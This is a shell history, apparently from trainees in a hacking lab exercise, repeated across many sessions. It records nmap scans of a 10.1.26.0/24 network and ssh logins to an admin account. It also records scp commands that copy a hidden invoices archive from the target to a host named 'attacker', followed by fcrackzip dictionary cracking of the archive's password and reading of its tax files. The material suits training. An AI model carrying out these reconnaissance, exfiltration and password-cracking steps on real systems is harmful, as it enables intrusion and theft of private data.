fcrackzip -u -D -p /root/hacking/wordlist.txt .invoices2019.zip
ls
ls -a
unzip .invoices2019.zip
ls
cd /
ls
cd home
ls
cd root
ls
ls -a
cd ..
ls
cd debian
ls
cd /
clear
ls
cd lost+found/
ls
ls -la
cd ..
ls -la
clear
ls
cd home
ls
ls -la
cd debian
ls -la
cd ..
cd root
ls -la
ls
cd ..
cd debian
ls
clear
cd ..
cd root
ls
cd ..
cd ..
cd ..
ls
cd hacking
ls
cd ..
ls -a
cd ~
ls
cd hacking
ls
cat wordlist.xtx
cat wordlist.txt
clear
nmap --help
clear
nmap 10.1.26.0/24
clear
nmap 10.1.26.0/24
admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal
ls
ls -l
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
clear
ls
cat Mydata.xlsx
clear
ls
np 10.1.26.9
nmap 10.1.26.9
ls
cd ..
ls
ls -a
cd personal
ls -a
scp .invoices2019.zip
scp @: / .invoices2019.zip
scp .invoices2019.zip @: /
scp .invoices2019.zip @: /home
scp .invoices2019.zip @:/
scp .invoices2019.zip admin@server /
scp .invoices2019.zip 10.1.26.9 /
scp .invoices2019.zip @: /
scp .invoices2019.zip @: /home
clear
scp .invoices2019.zip @: /home/hacking
scp .invoices2019.zip @: /root
scp .invoices2019.zip @: /home/debian
scp .invoices2019.zip @: /
scp .invoices2019.zip @: /lost+found/
clear
scp .invoices2019.zip @: /
man ssh
scp .invoices2019.zip @: /
ssh admin@10.1.26.9
cd r
ls
cd personal/
clear
ls
scp .invoices2019.zip @: /
an ssh
man ssh
cat wordlist
ls
scp wordlist.txt @: /
scp wordlist.txt admin@10.1.26.9:/
cat wordlist.txt
clear
scp wordlist.txt admin@10.1.26.9:/personal
scp wordlist.txt admin@10.1.26.9:/remote/personal
scp wordlist.txt admin@10.1.26.9:/personal
ssh admin@10.1.26.9
cd personal/
scp .invoices2019.zip @: /
scp .invoices2019.zip attacker@10.1.26.23: /
scp .invoices2019.zip root@10.1.26.23: /
scp .invoices2019.zip root@10.1.26.23: /home
clear
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
cd ..
ls
ls
cd /
ls
cd root
ls
ls -a
cd /
ls -a
ls -l
clear
ssh admin@10.1.26.9
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
ls -a
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D -p wordlist.txt .invoices2019.zip
ls
pwd
cd hacking
ls
wordlist.txt
vim wordlist.txt
nmap
zenmap
nmap -T4 -A -v 10.1.26.0/24
nmap 10.1.26.0/24
ssh admin@10.1.26.9
pwd
ls
cd personal
ls
cd
ls
cd personal
ls
cd Croatia #033[F
cd croatia
cd 'Croatia 2019'
ls
cd
cd personal
cd 'Italy 2018'
ls
cd
ls
cd personal
ls
ls -a
cd .
ls
ls -a
scp
scp invoices2019.zip attacker@10.1.26.23
scp .invoices2019.zip attacker@10.1.26.23
scp .invoices2019.zip attacker@10.1.26.23
scp '.invoices2019.zip' attacker@10.1.26.23
scp '.invoices2019.zip' attacker@10.1.26.23/home
scp '.invoices2019.zip' attacker@10.1.26.23/root/home
scp '.invoices2019.zip' attacker@10.1.26.23:/root/home
scp '.invoices2019.zip' root@10.1.26.23/root/home
scp '.invoices2019.zip' root@10.1.26.23:/root/home
scp '.invoices2019.zip' root@ss10.1.26.23:/root/home
s
ssh admin@10.1.26.9
ls
cd personal
ls -a
cd
cd personal
pwd
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@10.1.26.23:root/home
cd
scp /home/admin/personal/.invoices2019.zip root@10.1.26.23:/home
cd home
ls
pwd
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip
scp -t  admin@10.1.26.9:/home/admin/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
cd hacking
ls
ls -a
cd
ls -a
fcrackzip -h
fcrackzip -v -u -b .invoices2019.zip
fcrackzip -v -u -b -c a .invoices2019.zip
fcrackzip -v -u -b -c aA .invoices2019.zip
ls
cd hacking
ls
cd
fcrackzip -D /hacking/wordlist.txt .inveoices2019.zip
fcrackzip -D ~/hacking/wordlist.txt .inveoices2019.zip
fcrackzip -d ~/hacking/wordlist.txt .inveoices2019.zip
fcrackzip -h
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D /home/hacking/wordlist.txt .invoices2019.zip
cd hacking
pwd
fcrackzip -D /root/hacking/wordlist.txt .invoices2019.zip
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
fcrackzip -D -u -p /root/hacking/wordlist.txt  .invoices2019.zip
cd
fcrackzip -D -u -p /root/hacking/wordlist.txt  .invoices2019.zip
unzip .invoices2019.zip
nmap
nmap -sL
nmap --help
nmap 10.1.26.0/24
history
ssh --help
ssh admin@10.1.26.9/22
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal
ls
cd croatia
cd 'Croatia 2019'
ls
cd ..
cd 'Italy 2018'
ls
cd ..
cd ..
cd ..
ls
cd debian
ls
cd ..
cd ..
ls
cd home
ls
cd admin
ls
dir
cd personal
dir
cd ..
cd ..
find . -iname \*.zip
ls
cd admin
dir
cdc personal
cd personal
dir
cd ..
dir
cd personal
ls
ls -a
scp -r admin@server:./.invoices2019.zip /root/hacking
scp -r admin@server:.invoices2019.zip /root/hacking
scp -r admin@server:/.invoices2019.zip /root/hacking
scp -r admin@server:home/admin/personal/.invoices2019.zip /root/hacking
ls -a
pwd
scp -r admin@server:/home/admin/personal/.invoices2019.zip /root/hacking
scp -r admin@server:/home/admin/personal/.invoices2019.zip /
history
quit
exit
scp admin@server:/home/admin/personal/.invoices2019.zip /
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /
history
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /home/root/hacking
ls
hacking
cd hacking
ls
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /
ls
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ./
ls
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@attacker:/home/roor/hacking
hostname -I
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@attacker:/home/root/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@10.1.26.23:/home/root/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@192.168.129.44:/home/root/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /
man fcrackzip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@attacker:/root/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/hacking
ls
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip .
ls
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip .
ls -a
man fckrackzip
man fcrackzip
fcrackzip -d
fcrackzip --d
fcrackzip --d --help
fcrackzip --d ./.invoices2019.xip
fcrackzip --d ./.invoices2019.zip
fcrackzip --d /.invoices2019.zip
ls /a
ls -a
fcrackzip --d .invoices2019.zip
fcrackzip --d invoices2019.zip
fcrackzip --d /home/root/hacking/.invoices2019.zip
fcrackzip --d /home/root/hacking/wordlist.txt
fcrackzip --d wordlist.txt .invoices2019.zip
fcrackzip --d .invoices2019.zip wordlist.txt
fcrackzip --d .invoices2019.zip
fcrackzip --b .invoices2019.zip
fcrackzip --dictionary .invoices2019.zip
man fcrackzip
fcrackzip -D -p  wordlist.txt .invoices2019.zip
ls
cd hacking/
ls
cat wordlist.txt
cd ./
ls
nmap 10.1.26.0/24
cd ../
ping 10.1.26.9
ssh admin@10.1.26.9
exit
ssh --help
ssh admin@10.1.26.9
ls -l
cd personal/
ls -l
cd ../
ls -l -a
cat .bash_history
cat .profile
cd ..
ls -l
cd admin
ls -l
cd personal
ls -l -a
scp --help
scp .invoices2019.zip root@10.1.26.23:/~
scp .invoices2019.zip root@attacker:/~
exit
ls -l
scp admin@10.1.26.9:/~/personal/.invoices2019.zip /~
ssh admin@10.1.26.9
cd personal
exit
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~
ls -l
ls -l -a
man fcrackzip
mv .invoices2019.zip hacking
cd hacking
ls -l -a
cat wordlist.txt
sort wordlist.txt
cat wordlist.txt
touch wordlist_sorted.txt
sort wordlist.txt > wordlist_sorted.txt
cat wordlist_sorted.txt
man fcrackzip
fcrackzip -d -p wordlist_sorted.txt .invoices2019.zip
fcrackzip --dictionary -p wordlist_sorted.txt .invoices2019.zip
exit
startgame
flag startgame
ls /root/hacking
nmap --help
nmap 10.1.26.0/24
nmap 10.1.26.9
ssh username@10.1.26.9
admin@10.1.26.9
username@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
cd..
cd ..
ls
cd ..
ls
cd admin
ls
cd..
cd ..
cd debian/
ls
ls
ls -a
ls -a
cd ..
ls -a
cd ..
ls -a
cd home/
ls -R
ls -R -a
cd admin/personal/
ls -a
scp admin@10.1.26.9:/home/personal/.invoices.zip invoices.zip
scp admin@10.1.26.9:/home/personal/.invoices2019.zip invoices.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip invoices.zip
ls
man fcrackzip
man fcrackzip
ls -R
fcrackzip -D -p /hacking/wordlist.txt invoices.zip
fcrackzip -D -p ./hacking/wordlist.txt invoices.zip
fcrackzip -u -D -p ./hacking/wordlist.txt invoices.zip
ls
su
cd /root
ls
cd hacking
ls
cat wordlist.txt
cd ~
ls
cd hacking
ls
nmap 10.1.26.0/24
ssh admin@10.1.26.9
cd
ls
cd personal
ls
cat Mydata.xlsx
ls
ls
ls -l
ls -al
scp .invoices2019.zip root@attacker
exit
ls
cd ..
ls
ls -al
ssh admin@10.1.26.9
scp .invoices2019.zip root@attacker:~/file.zip
exit
scp admin@10.1.26.9:.invoices2019.zip .
scp admin@10.1.26.9:~/.invoices2019.zip .
ssh admin@10.1.26.9
ls
ls -al
ls -al
cd personal
ls -al
exit
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
ls -al
man fcrackzip
man fcrackzip
fcrackzip -D hacking/wordlist.txt .invoices2019.zip
fcrackzip -D .invoices2019.zip
man fcrackzip
man fcrackzip
man fcrackzip
fcrackzip -D -p hacking/wordlist.txt .invoices2019.zip
unzip .invoices2019.zip
ls
cat invoices2019/
cd invoices2019/
ls
cat TAX157962.txt
cat TAX15796249.txt
cat TAX15796252.txt
cat TAX15796259.txt
exit
exit
ls
msfconsole
ls
ls -A
ls -A
ls
cd /root
ld
ls
cd hacking/
sudo cd hacking/
sudo cd hacking/
cd
ls
cd /root/hacking/
cd root
cd /root
ls -a
cd hacking
sudo su
ls
sudo cd hacking/
sudo cd hacking/
sudo login
sudo su
exit
exit
cd /root
ls
cd hacking/
ls
nmap 10.1.26.0/24
nmap 10.1.26.9
nmap -sV 10.1.26.9
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
scp Mydata.xlsx root@attacker
cd
cd /home/admin
ls -a
cd personal/
ls -A
scp .invoices2019.zip  root@attacker
scp .invoices2019.zip  root@attacker/invoices2019.zip
exit
ld
ls
cd ..
ls
ls -A
scp admin@server:/personal/.invoices2019.zip hacking/
scp admin@10.1.26.9:/personal/.invoices2019.zip hacking/
scp admin@10.1.26.9:home/admin/personal/.invoices2019.zip hacking/
ssh admin@10.1.26.9
cd personal/
scp .invoices2019.zip  root@attacker:/hacking
scp .invoices2019.zip  root@attacker:/hacking
scp .invoices2019.zip  root@attacker
scp .invoices2019.zip  root@attacker:/hacking
scp .invoices2019.zip  root@attacker
scp .invoices2019.zip  root@10.1.26.0
exit
ls
ls -A
cd /root/
ls -A
cd hacking/
ls -A
cd ..
ssh admin@10.1.26.9:/personal/.invoices2019.txt hacking/
ssh admin@10.1.26.9:/personal/.invoices2019.txt hacking/ -v
ssh admin@10.1.26.9:/personal/.invoices2019.zip hacking/
scp admin@10.1.26.9:/personal/.invoices2019.zip hacking/
ssh -F ~/.ssh/pool-id-ID-sandbox-id-ID-user-config link-11_home-switch
cd /root
ls /root
cd ~
ls
cd hacking/
ls
echo wordlist.txt
vim wordlist.txt
nmap --help
man nmap
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls
cd 'Croatia 2019'/
ls
cd ..
cd 'Italy 2018'/
ls
cd ..
vim Mydata.xlsx
cd ~
ls
ls -a
cd personal/
ls -a
scp .invoices2019.zip root@attacker:/root
scp admin@10.1.26.9:~/personal/.invoices.zip ~
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~
man fcrackzip
fcrackzip --brute-force .invoices2019.zip
fcrackzip --brute-force --use-unzip .invoices2019.zip
ls
cd hacking/
ls
cd ..
fcrackzip -u -v -D -p ~/hacking/wordlist.txt .invoices2019.zip
ls
exit
ls
su
ls
pwd
cd /root
ls
ls hacking
nmap --help
nmap 10.1.26.0/24
ssh admin@10.1.26.9
cd
ls
ls personal/
scp @: /
scp admin@10.1.26.23:/
scp -r admin@10.1.26.23:/ /
scp -r root@10.1.26.23:/ /
scp -r 10.1.26.23:/ /
scp -r root@10.1.26.23:/ /
exit
scp -r admin@10.1.26.9:/ /
scp -r admin@10.1.26.9:/ /home/root/personal
ssh admin@10.1.26.9
ls
pwd
exit
scp -r admin@10.1.26.9:/home/admin/personal .
ls
ls personal/
ls personal/Croatia\ 2019/
ls personal/Italy\ 2018/
ls personal/Croatia\ 2019/
ls personal/Italy\ 2018/
ls personal/.
ssh admin@10.1.26.9
ls
ls -a
find -r .zip
find . -r .zip
cd personal/
ls -a
exit
cd personal
ls
ls -a
fcrackzip
fcrackzip .invoices2019.zip
man fcrackzip
fcrackzip -b .invoices2019.zip
man fcrackzip
man fcrackzip
ls
fcrackzip -b -D ../dictionary.txt .invoices2019.zip
ls ..
ls ../hacking
fcrackzip -b -D ../hacking/wordlist.txt .invoices2019.zip
pwd
fcrackzip -b -D /root/hacking/wordlist.txt .invoices2019.zip
man fcrackzip
fcrackzip -D -p /root/hacking/wordlist.txt .invoices2019.zip
exit
ls
exit
ls -l
find . -mindepth  -maxdepth  -not -empty -type d
find . -mindepth 1 -maxdepth 1 -not -empty -type d
cd hacking
ls -l
nmap --help
nmap -sP 10.1.26.0/24
nmap -p 10.1.26.0/24
nmap -p- 10.1.26.0/24
ssh admin@10.1.26.9
ls -l
ls -lwx
ls -lw
ls -l
cd personal
ls
cd ..
ls -l
find . |grep -e "\.zip$"
exit
scp admin@10.1.26.9:/personal/.invoices2019.zip ./hacking
scp admin@10.1.26.9:/root/personal/.invoices2019.zip ./hacking
scp admin@10.1.26.9:/root/personal/.invoices2019.zip ./hacking
scp admin@10.1.26.9:/root/personal/.invoices2019.zip /root
scp admin@10.1.26.9:/root/personal/.invoices2019.zip /root
ssh admin@10.1.26.9
scp ./personal/.invoices2019.zip root@attacker:/root/hacking
exit
scp admin@10.1.26.9:/root/personal/.invoices2019.zip
scp admin@10.1.26.9:/root/personal/.invoices2019.zip ./
ssh admin@10.1.26.9
cd personal
ls -l
chmod --help
chmod .invoices.2019 a +rwx
chmod o-rwx .invoices2019.zip
ls -l
ls -al
chmod a+rwx .invoices2019.zip
ls -al
exit
scp admin@10.1.26.9:/root/personal/.invoices2019.zip ./
ssh admin@10.1.26.9
chmod a+rwx personal
ls -al
exit
scp admin@10.1.26.9:/root/personal/.invoices2019.zip ./
scp admin@10.1.26.9:./personal/.invoices2019.zip ./
ls -al
fcrackzip .invoices2019.zip
.invoices2019.zip
unzip .invoices2019.zip
ls -l
cd invoices2019
ls -l
cd ..
ls
cd Desktop/
ls
cd ..
cd Downloads/
ls
cd ..
cd Music/
cd ..
ls
cd hacking/
ls
nmap --help
man nmap
nmap 10.1.26.0/24
nmap 10.1.26.9
ssh admin@password
ssh admin@123456
ssh admin@admin
ssh admin@123456
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd .
cd ..
cd ..
cd ..
ls
cd ..
ls
cd home/
cd admin/
ls
$HOME /home/admin
cd
ls
$HOME /home/admin
$HOME
HOME
ls -a
cd ..
ls -a
cd ..
ls -a
cd home
ls -al
cd $HOME
ls -a
ls -al
ls -l
ls -a
exit
/home# scp admin@...:~/personal/.invoices2019.zip
cd ..
ls
cd hacking/
scp admin@...:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9 ~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9: /personal/.invoices2019.zip
scp admin@10.1.26.9: /personal/.invoices2019.zip
scp admin@10.1.26.9: ~/personal/.invoices2019.zip
scp admin@10.1.26.9: ~/personal/
scp admin@10.1.26.9: ~/personal/.invoices2019.zip
scp admin@10.1.26.9: ~/personal/.invoices2019.zip ./
ssh admin@10.1.26.9
ls
cd personal/
ls -a
exit
scp admin@10.1.26.9: ~/personal/.invoices2019.zip ./
scp admin@10.1.26.9: ~/personal/.invoices2019.zip ~
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~
cd
cd hacking/
ls
ls -a
cd ..
ls -a
fcrackzip -h
cd hacking/
ls
wordlist.txt
cat wordlist.txt
cd ..
fcrackzip -D ./hacking/wordlist.txt
fcrackzip .invoices2019.zip -D ./hacking/wordlist.txt
fcrackzip -D -u -p /hacking/wordlist.txt .invoices2019.zip
ls
fcrackzip -D -u -p ./hacking/wordlist.txt .invoices2019.zip
ls
ls
ls
ls
cd /
ls
cd ~
ls
ls
ls
cd /home/
ls
cd debian/
ls
cd ..
cd user-access/
ls
cd ..
cd ..
cd root/
ls
cd hacking/
ls
ls hacking/
file hacking/
sudo cd root
ls
cd hacking/
su
cd hacking/
ls
cat wordlist.txt
ls
nmap
nmap --help
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls
cd 'Croatia 2019'/
ls
cd ..
find . -name "*.zip"
ls -la
scp .invoices2019.zip root@10.1.26.23:/root
scp .invoices2019.zip user@10.1.26.23:/root
fcrackzip
scp .invoices2019.zip user@attacker:/root
scp .invoices2019.zip root@10.1.26.23:/root
exit
ifconfig -a
ssh admin@10.1.26.9
pwd
ls
cd personal/
ls -la
ls .invoices2019.zip
pwd
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root
ls
cd /root/
ls
ls -la
fcrackzip
fcrackzip --help
ls
cd hacking/
ls
fcrackzip --dictionary wordlist.txt ../.invoices2019.zip
fcrackzip --dictionary ../.invoices2019.zip
fcrackzip ../.invoices2019.zip
unzip -h
unzip ../.invoices2019.zip
fcrackzip ../.invoices2019.zip --dictionary
fcrackzip ../.invoices2019.zip --dictionary wordlist.txt
fcrackzip -u ../.invoices2019.zip
fcrackzip -h
fcrackzip -D wordlist.txt
fcrackzip -D wordlist.txt ../.invoices2019.zip
cp ../.invoices2019.zip .
fcrackzip -D wordlist.txt .invoices2019.zip
head wordlist.txt
cat wordlist.txt | grep aaaaa
fcrackzip -v .invoices2019.zip
fcrackzip -v -u .invoices2019.zip
su
ls
cd ..
cd ..
cd /root/
ls
ls -la
cd hacking/
la -la
ls -la
ls
cat invoices2019/
ls invoices2019/
cd invoices2019/
ls
cat TAX15796249.txt
cat TAX15796252.txt
cat TAX15796259.txt
cd ..
ls
fcrackzip -D
fcrackzip -D ./wordlist.txt
fcrackzip .invoices2019.zip -D ./wordlist.txt
fcrackzip -v .invoices2019.zip -D ./wordlist.txt
fcrackzip -h
ls
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D .invoices2019.zip
ls
cat wordlist.txt | wc -l
fcrackzip -D .invoices2019.zip < wordlist.txt
head wordlist.txt
cat wordlist.txt
unzip
echo 123 | unzip .invoices2019.zip
ls
fcrackzip -D wordlist.txt -- .invoices2019.zip
man fcrackzip
cat wordlist.txt | sort > words.txt
diff wordlist.txt words.txt
fcrackzip -D words.txt -- .invoices2019.zip
fcrackzip -D words.txt .invoices2019.zip
man fcrackzip
fcrackzip -D -p words.txt .invoices2019.zip
unzip .invoices2019.zip
cd invoices2019/
ls TAX157962
cat TAX15796249.txt
man fcrackzip
fcrackzip -h
exit
exit
exit
exit
ls
cd hacking
ls
cd..
cd..
cd.
nmap --help
nmap -v 10.1.26.0/24
nmap --help
ssh admin@10.1.26.0/2049
ssh admin@10.1.26.0/24
ssh admin@10.1.26.0/24/2049
ssh admin@10.1.26.0.2049/24
ssh admin@10.1.26.0.2049/24:2049
ssh admin@10.1.26.0.2049:2049
ssh admin@10.1.26.0/24:2049
ssh admin@10.1.26.0:2049
ssh admin@10.1.26.9
ls
cd personal
ls
cd Mydata.xlsx
cd Croatia 2019
cd Croatia\ 2019/
ls
cd..
cd-
cd/
cd ..
cd Italy\ 2018/
ls
cd ..
cd ..
cd ..
ls
cd admin/
ls
cd personal/
ls
cd ..
ls
cd ..
ls
cd debian/
ls
ls
cd ..
cd admin/
cd personal/
ls
scp @: Mydata.xlsx
cd ..
cd ..
ls
cd admin/
ls
ls -a
cd personal/
ls -a
scp admin@.invoices2019.zip/Desktop
scp admin@.invoices2019.zip/user/Desktop
scp admin@remote:.invoices2019.zip/Desktop
scp admin@remote:/.invoices2019.zip/Desktop
scp admin@remote:/personal/.invoices2019.zip/user/Desktop
scp admin@remote:admin/home/personal/.invoices2019.zip/user/Desktop
exit
ls
ls -A
cd root
login
cd .profile
ls -A
cd root
cd ./root
exit
ls -A
cat .ssh
cd .ssh
ls
cd ..
cat .profile
cd $HOME
ls
ls -A
cat .profile
ls
cd hacking
ls -A
nmap 10.1.26.0\24
nmap --help
cd ..
nmap 10.1.26.0\24
nmap 10.1.26.0/24
nmap 10.1.26.9
ssh admin@10.1.26.9
ls -A
cd personal
ls -A
scp --help
scp .invoices2019.zip
scp .invoices2019.zip .
scp admin@10.1.24.9:personal
scp admin@10.1.24.9:personal/.invoices2019.zip .
scp admin@10.1.24.9:personal/.invoices2019.zip root
scp @
scp @ /
cd root
ls -A
cd hacking
ls -A
scp wordlist.txt admin@10.1.26.9
scp wordlist.txt admin@10.1.26.9:personal
ls -A
fcrackzip -help
fcrackzip
fcrackzip
scp .invoices2019.zip root@attacker
scp .invoices2019.zip root@attacker:root
fcrackzip -h
scp admin@10.1.26.9:personal/.invoices2019.zip .
fcrackzip -h
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D wordlist.txt
fcrackzip -u -p wordlist.txt .invoices2019.zip
fcrackzip -u -D -p wordlist.txt .invoices2019.zip
unzip ssh-access.zip -d ~/.ssh/
ls
cd C:
cd ..
ls
cd home
cd hacking
cd home
cd ~\
cd hacking
ls
nano wordlist.txt
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal
ls
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
ls -l
nano Mydata.xlsx
Mydata.xlsx
vim Mydata.xlsx
ls -A
scp .invoices2019.zip root@attacker
ls
cd Downloads/
ls
cd ..
cd ..
ls
cd ~
ls -A
cd Downloads/
ls -A
cd ..
cd ..
ls -A
cd ~
scp admin@server /personal/.invocies2019.zip Downloads/
scp admin@server:/personal/.invocies2019.zip Downloads/
scp admin@10.1.26.9:/personal/.invocies2019.zip Downloads/
scp admin@10.1.26.9:/personal/.invoices2019.zip Downloads/
scp admin@10.1.26.9:~/personal/.invoices2019.zip Downloads/
cd Downloads/
ls
ls -A
fcrackzip -d
fcrackzip -h
fcrackzip -D .invoices2019 hacking/wordlist.txt
ls -A
fcrackzip -D .invoices2019.zip hacking/wordlist.txt
fcrackzip -D .invoices2019.zip ~/hacking/wordlist.txt
fcrackzip -D ~/hacking/wordlist.txt .invoices2019.zip
fcrackzip -D ~/hacking/wordlist.txt .invoices2019.zip
fcrackzip .invoices2019.zip
fcrackzip -u -D -p ~/hacking/wordlist.txt .invoices2019.zip
ls
cd hacking
ls
nmap
nmap -sL
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ../Italy\ 2018/
ls
cd ..
ls -a
scp admin@10.1.26.9:.invoices2019.zip /
scp admin@10.1.26.9:personal/.invoices2019.zip /
scp admin@10.1.26.9:personal/.invoices2019.zip /
scp admin@10.1.26.9:personal/.invoices2019.zip root@attacker/
scp root@attacker/ admin@10.1.26.9:personal/.invoices2019.zip
scp .invoices2019.zip root@attacker/
scp .invoices2019.zip root@10.1.26.0/24/
scp .invoices2019.zip root@10.1.26.0/
scp .invoices2019.zip /
scp .invoices2019.zip root@10.1.26.0:/
scp .invoices2019.zip root@10.1.26.0/24:/
scp .invoices2019.zip root@10.1.26.0:24/
scp -P 24  .invoices2019.zip root@10.1.26.0/
scp -P 24  .invoices2019.zip root@10.1.26.0/root/
scp -P 24  .invoices2019.zip root@10.1.26.0
ls
ls -a
scp -P 24  .invoices2019.zip root@10.1.26.0/
scp admin@10.1.26.9:/.invoices2019.zip /
scp admin@10.1.26.9:.invoices2019.zip /
scp admin@10.1.26.9:/personal/.invoices2019.zip /
scp admin@10.1.26.9:personal/.invoices2019.zip /
scp admin@server:personal/.invoices2019.zip /
scp admin@server:/home/personal/.invoices2019.zip /
pwd
scp admin@server:/home/admin/personal/.invoices2019.zip /
scp -P 24 .invoices2019.zip root@10.1.26.0:/
scp admin@10.1.26.9:~/personal/.invoices2019.zip Download/
scp admin@10.1.26.9:~/personal/.invoices2019.zip Downloads/
scp admin@10.1.26.9:~/personal/.invoices2019.zip /root/Downloads/
scp admin@10.1.26.9:~/personal/.invoices2019.zip Downloads/
scp admin@10.1.26.9:~/personal/.invoices2019.zip root/Downloads/
ls
cd /root
ls
cd hacking
sudo cd hacking
sudo login
ls
su login
su root
ls
cd hacking/
ls
cd ..
nmap 10.1.26.0/24
Nmap scan report for 10.1.26.9
nmap scan report for 10.1.26.9
nmap 10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
ls-a
ls -a
scp .invoices2019.zip root@attacker:/hacking
scp .invoices2019.zip root@10.1.26.23:/hacking
scp .invoices2019.zip root@10.1.26.23
su root
cd ..
cd ..
ls
cd home/
ls
cd user-access/
ls
scp .invoices2019.zip root@10.1.26.23:/home/user-access
scp .invoices2019.zip user-access@10.1.26.23:/home/user-access
cd ..
ls
scp .invoices2019.zip root@attacker:/home/user-access
whoami
who
scp .invoices2019.zip user-access@10.1.26.254:/home/user-access
scp .invoices2019.zip debian@10.1.26.254:/home/user-access
scp admin@10.1.26.9:/personal/.invoices2019.zip /user-access
ls -a
scp admin@10.1.26.9:~/personal/.invoices2019.zip /user-access
cd user-access/
ls
ls -a
cd ..
ls
cd ..
ls
cd user-access
scp admin@10.1.26.9:~/personal/.invoices2019.zip /home/user-access
cd home/
cd user-access/
ls -a
fcrackzip .invoices2019.zip
cd ..
ls
cd debian/
ls
cd ..
cd ..
ls
cd lost+found/
ls
cd ..
find -name wordlist
fcrakzip
fcrakzip -h
fcrackzip -h
cd home/
cd user-access/
fcrackzip -D .invoices2019.zip
cd ./var/lib/dictionaries-common/wordlist /home/user-access
cd "./var/lib/dictionaries-common/wordlist" /home/user-access
cd "./var/lib/dictionaries-common/wordlist" "/home/user-access"
cp ./var/lib/dictionaries-common/wordlist /home/user-access
cd ..
cd ..
cd .var
cd var
cd lib
cd dictionaries-common/
ls
cd wordlist/
ls
cp ./var/lib/dictionaries-common/wordlist/wamerican /home/user-access
ls -a
file *
cp /var/lib/dictionaries-common/wordlist/wamerican /home/user-access
cd ..
cd ..
cd ..
cd ..
cd home/
cd user-access/
ls
ls -a
fcrackzip -D wamerican .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D -u -p wamerican .invoices2019.zip
fcrackzip -D -p wamerican .invoices2019.zip
fcrackzip -D -p -v wamerican .invoices2019.zip
fcrackzip -v -D -p wamerican .invoices2019.zip
ls -a
cd .invoices2019
unzip .invoices2019
fcrackzip -v -D -p wamerican .invoices2019.zip
fcrackzip -v -u -D -p wamerican .invoices2019.zip
fcrackzip -v -u -D wamerican .invoices2019.zip
locate wordlist
cp /root/hacking/wordlist.txt /home/user-access
ls -a
fcrackzip -v -u -D wordlist.txt .invoices2019.zip
fcrackzip -v -u -D -p wordlist.txt .invoices2019.zip
exit
exit
exit
exit
exit
ls
ls -la
ls
cd ..
ls
cd ..
ls
cd home/
ls
cd user-access/
cd ..
cd ..
ls
cd ..
ls
cd m
cd mnt
ls
ls -la
cd ..
cd home/
cd user-access/
ls
ls -la
whoami
cd ..
ls
cd ,,
cd ..
ls
cd usr/
ls
cd ..
cd home/user-access/
su root toor
su root
cd ..
ls
cd ~
ls
cd ..
ls
cd home/
ls
cd debian/
ls
cd ~
ls
cd /root
ls
cd ..
ls -la
cd /root
ls
cd hacking/
ls
nmap --help
ifconfig
npam -sn 10.1.26.0/24
nmap -sn 10.1.26.0/24
nmap -Fsn 10.1.26.0/24
nmap -F 10.1.26.1
nmap -F 10.1.26.2
nmap -F 10.1.26.4
nmap -F 10.1.26.9
